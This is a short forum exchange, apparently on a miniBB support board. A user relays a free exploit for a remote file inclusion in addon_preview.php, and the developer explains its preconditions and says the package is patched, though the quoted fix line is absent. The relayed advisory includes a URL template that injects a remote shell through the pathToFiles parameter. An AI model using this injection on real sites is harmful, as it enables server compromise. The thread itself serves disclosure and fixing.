I'm not looking to stir any trouble but I often search for exploits/vulns concerning the software that I personally use/run and I came across this today on an exploits-for-sale website, this particular exploit is being offered for free currently:
=====
Found vulnerable code in file addon_preview.php line: 12
So an attacker can use it to compromise the system.
Not declared before &require parameter is: $pathToFiles
h t t p : / / [target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
=====

Thanks for this.

The only fix to provide is to put this line on top of execution of addon_preview.php:

Possibly this was out from the very ancient times, and the exploit actually will work only if PHP's setting register_globals is set to ON, which nowadays, obviously, met truly rarely on hostings. Also, it would work only on miniBB installations which would have Preview add-on installed.

I've updated the official package regarding this fix. Thanks again.